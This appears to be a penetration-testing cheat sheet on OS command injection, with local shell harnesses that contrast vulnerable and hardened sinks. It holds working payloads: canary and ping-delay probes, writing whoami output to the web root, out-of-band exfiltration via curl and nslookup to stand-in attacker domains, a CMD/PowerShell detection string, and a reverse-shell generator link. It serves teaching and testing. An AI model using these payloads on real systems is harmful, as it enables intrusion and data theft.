OS command injection

Command injection

& echo qwerty &

Placing & before and after the injected command is generally useful: the leading & ends whatever command the input landed in, and the trailing & separates the injected command from whatever follows the injection point. The canary (qwerty) is just an easily spotted string; if it comes back in the response, the input reached a shell.
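The check above run against a deliberately vulnerable sink and against a hardened one. This is an added example, not code from the original page; the function names (vuln_report, safe_report, valid_name, injectable) and the report directory under a temp dir are assumptions, and the report file is constructed sample data.

```shell
#!/bin/sh
# Added example, not code from the original page: a deliberately vulnerable
# sink that builds a shell command string from user input, next to a hardened
# version, and the canary check from the cheat sheet run against both.
# The report directory and file are constructed sample data.

WORKDIR=$(mktemp -d)
mkdir -p "$WORKDIR/reports"
printf 'q1 revenue: 100\n' > "$WORKDIR/reports/q1.txt"

# VULNERABLE: the input lands inside a string that sh parses again, so a
# separator in it (& ; | newline ...) starts a new command.
vuln_report() {
    sh -c "cat $WORKDIR/reports/$1.txt" 2>/dev/null
}

# Allow-list the identifier; do not try to strip metacharacters.
valid_name() {
    case "$1" in
        ''|*[!A-Za-z0-9_-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# HARDENED: validate, then hand the input to cat as one argument. No shell
# re-parses it, so separators are just bytes in a filename that does not exist.
# (The allow-list also blocks path traversal such as ../../etc/passwd, which
# argument passing alone would not.)
safe_report() {
    valid_name "$1" || return 1
    cat -- "$WORKDIR/reports/$1.txt" 2>/dev/null
}

# Detection from the cheat sheet: send the canary and look for it in the
# response. Returns 0 when the canary came back, i.e. injection confirmed.
injectable() {
    "$1" '& echo qwerty &' | grep -qx qwerty
}
```

With `injectable vuln_report` the response contains a line that is exactly qwerty, because sh split the interpolated string into `cat .../reports/ &`, `echo qwerty &` and `.txt`; with `injectable safe_report` the allow-list rejects the input before anything runs, and even without the allow-list the payload would only be an odd filename passed to cat.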


Blind OS command injection

Detection

# ~10 second delay: 10 echo requests one second apart. A response that takes that much longer than usual shows the command ran even though nothing is returned
& ping -c 10 127.0.0.1 &

Exploit

  1. Redirecting output into the web root. Note: you need write permission on that directory, and the URL depends on how the web root maps to the filesystem
& whoami > /var/www/static/whoami.txt &
curl https://website.com/whoami.txt
  2. Out-of-band techniques: put the command's output in a hostname you control and watch for the request
& curl `whoami`.webserver-attacker.com & # HTTP egress may be blocked
& nslookup `whoami`.kgji2ohoyw.web-attacker.com & # DNS usually gets out even when HTTP does not
  3. Open a shell (see Reverse Shell Generator below)
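The time-delay detection and the output-redirection exploit above, run locally against a blind sink. This is an added example, not code from the original page: the feedback-form sink (submit_feedback), elapsed_seconds and exfil_via_file are assumed names, sleep stands in for ping -c 10 127.0.0.1 with a shorter delay, a temp directory stands in for /var/www/static, and reading the file stands in for the curl step.

```shell
#!/bin/sh
# Added example, not code from the original page: a blind sink (the app runs
# a shell command with user input but never returns its output), plus the two
# blind techniques from the list above. sleep stands in for "ping -c 10
# 127.0.0.1" with a shorter delay; a temp directory stands in for the web root
# and reading the file stands in for curl.

STORE=$(mktemp -d)
WEBROOT="$STORE/www"
mkdir -p "$WEBROOT"

# VULNERABLE blind sink: a feedback form appends the comment to a log by way
# of sh -c. The backend captures stdout/stderr (as most web backends do) but
# never sends them to the client, so the response carries no output; timing
# and filesystem side effects are the signals that remain.
submit_feedback() {
    _captured=$(sh -c "printf '%s\n' $1 >> $STORE/feedback.log" 2>&1) || true
}

# Time-based detection: whole seconds the request took. The injected job is
# backgrounded with &, but it inherits the pipe the backend reads from, so the
# backend still waits for it to finish before answering.
elapsed_seconds() {
    start=$(date +%s)
    submit_feedback "$1"
    end=$(date +%s)
    echo $((end - start))
}

# Output redirection: write the command's output into the web root, then
# fetch it. Needs write permission on that directory.
exfil_via_file() {
    submit_feedback "& whoami > $WEBROOT/whoami.txt &"
    cat "$WEBROOT/whoami.txt" 2>/dev/null
}
```

`elapsed_seconds '& sleep 2 &'` takes at least two seconds while a normal comment returns at once, and `exfil_via_file` returns the username the sink runs as. The caveat the harness makes visible: if the backend discarded the process's output to /dev/null instead of capturing it, the backgrounded sleep would not hold anything open and the delay would not be observed, so a negative timing result does not rule injection out.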

Bypass restriction

There are many ways; see: https://book.hacktricks.wiki/linux-hardening/bypass-bash-restrictions/index.html


Metacharacters

# Windows & Unix
# (&& runs the injected command only if the preceding one succeeds, || only if it fails; the others are unconditional)
&
&&
|
||

# Unix
;
newline (0x0a)

# Unix inline execution (runs first; its output becomes an argument of the original command)
`command`
$(command)
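Which separators fire regardless of the command they are appended to, and what inline execution actually gives you, checked in a shell. This is an added example, not code from the original page; canary_fires and inline_result are assumed names, true/false stand in for the command the injection follows, and the inline_result sink is assumed to reflect its argument.

```shell
#!/bin/sh
# Added example, not code from the original page: which of the separators
# above run the injected command unconditionally and which depend on the exit
# status of the command they are appended to. The preceding command is stood
# in for by true or false; the injected command is the echo canary.

# Returns 0 if "echo qwerty" ran after joining $2 (the preceding command) and
# the canary with separator $1.
canary_fires() {
    sh -c "$2 $1 echo qwerty" 2>/dev/null | grep -q qwerty
}

# A literal newline (0x0a): also a separator when the input is not limited to
# one line, e.g. a raw request body.
NL='
'

# Inline execution runs first and its output becomes an argument of the
# original command, so you only see it where that argument is reflected
# (or via the out-of-band tricks above). This assumed sink echoes it back.
inline_result() {
    sh -c "printf 'looking up %s\n' $1" 2>/dev/null
}
```

`;`, `|`, `&` and the newline fire whether the preceding command succeeded or not; `&&` needs it to succeed and `||` needs it to fail, which is why the unconditional ones are the safer first probe. `inline_result '$(echo qwerty)'` and the backtick form both return "looking up qwerty" because the substitution happens before the original command runs.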

Identify CMD or PowerShell

To determine whether commands are executed by PowerShell or CMD, use this snippet; it prints CMD under cmd.exe and PowerShell under PowerShell:

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Reverse Shell Generator

https://www.revshells.com/